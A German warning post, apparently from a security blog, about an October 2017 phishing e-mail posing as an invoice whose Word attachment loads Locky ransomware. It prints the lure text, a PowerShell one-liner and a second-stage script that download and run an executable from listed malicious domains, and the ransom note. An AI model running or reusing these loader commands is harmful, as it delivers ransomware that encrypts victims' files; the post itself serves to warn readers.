Invoice INV0000587, Sent from my iPhone bringt Locky Ransomware!

Am Dienstag, den 31. Oktober 2017 (Reformationstag und Halloween) wurde durch unbekannte Dritte die folgende betrügerische E-Mail in englischer Sprache versendet. Achtung: Das Word-Dokument lädt die Ransomware „Locky“ (Verschlüsselungs- und Epressungstrojaner) nachlädt! Diese benennt alle Dateien in *.asasin um! Öffnen Sie deswegen nicht die Anlage / die .doc-Datei!

Betreff: Invoice INV0000587
Absender: Mitzi Ashby ([email protected])

Sent from my iPhone

Achtung: Es handelt sich um eine betrügerische E-Mail! Öffnen Sie nicht die Anlage!

Die E-Mail bringt ein Microsoft Word – Dokument mit:

Invoice INV0000190.doc
Invoice INV0000587.doc

Invoice INV0000938.doc

Das Microsoft Word – Dokument sieht wie folgt aus:

PROTECTED DOCUMENT

This document is protected by Microsoft Office and requires human verification.
Please Enable Editing and Double Click below prove that you are not a robot.

Double Click Here
To Unlock Contents

CAN’T VIEW? FOLLOW THE STEPS BELOW.
1 Open the document in Microsoft Office. Previewing online does not work for protected documents.
2 If you downloaded this document from your email, please click „Enable Editing“ from the yellow bar above.
3 Double click above. The content of this Document will be reloaded.

Das stimmt aber nicht! Betrüger wollen Sie dazu bewegen, ein bösartigen Link auszuführen!

Ein Doppelklick auf das Bild würde ein Dokument erzeugen:

Dieses Dokument führt einen PowerShell-Befehl aus und soll die Adresse christakranzl.at/eiuhf384 laden:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring([System.Uri]’http://christakranzl.at/eiuhf384′))

Unter der Adresse sorgt ein Script dafür, dass von unterschiedlichen Domains eine Datei geladen wird:

$urls = „http://projex-dz.com/i8745fydd“,“http://celebrityonline.cz/i8745fydd“,“http://sigmanet.gr/i8745fydd“,“http://apply.pam-innovation.com/i8745fydd“,“http://bwos.be/i8745fydd“,“http://zahntechnik-imlau.de/i8745fydd“$urls = „http://projex-dz.com/i8745fydd“,“http://celebrityonline.cz/i8745fydd“,“http://sigmanet.gr/i8745fydd“,“http://apply.pam-innovation.com/i8745fydd“,“http://bwos.be/i8745fydd“,“http://zahntechnik-imlau.de/i8745fydd“foreach($url in $urls){
Try
{
Write-Host $url $fp = „$env:temp\requ4.exe“
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
Write-Host $_.Exception.Message
}
}

Klicken Sie daher nicht doppelt auf das Bild!

Zunächst würde eine Datei geladen:

Die o. g. Datei wird laut Virustotal bereits mit 14/67 erkannt.

Bei der Ausführung würde eine weitere Datei auf dem System angelegt:

Bei der Datei handelt es sich um den Verschlüsselungs- und Erpressungstrojaner „Locky“. Laut Virustotal liegt die Erkennungsrate bei 15/68.

Die „Locky“-Version benennt alle Dateien in *.asasin um:

 

Daneben produziert „Locky“ zwei Dateien, die auf die Verschlüsselung hinweisen:

asasin.bmp
asasin.htm

 

Nach Ende der Verschlüsselung werden beide Dateien automatisch geöffnet:

=$|$=-=.

!!! IMPORTANT INFORMATION !!!!

All of your files are encrypted with RSA-2048 and AES-128 ciphers.
More information about RSA and AES can be found here:
http://en.wikipedia.org/wiki/RSA_(cryptosystem)
http://en.wikipedia.org/wiki/Advanced_Encryption_Standard

Decrypting of your files is only possible with the private key and decrypt program, which is on our secret server.
To receive your private key follow one of the links:

If all of this addresses are not available, follow these steps:
1. Download and install Tor Browser: https://www.torproject.org/download/download-easy.html
2. After a successsful installation, run the browser and wait for initialization.
3. Type in the address bar: g46mbrrzpfszonuk.onion/*****
4. Follow the instructions on the site.

!!! Your personal identification ID: ******* !!!

#__ -*+
.–=-*-$|—_-

 

Außerdem tauscht „Locky“ den Bildschirmhintergrund gegen die asasin.bmp – Datei aus:

 

Die Erpressung würde wie folgt aussehen:

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.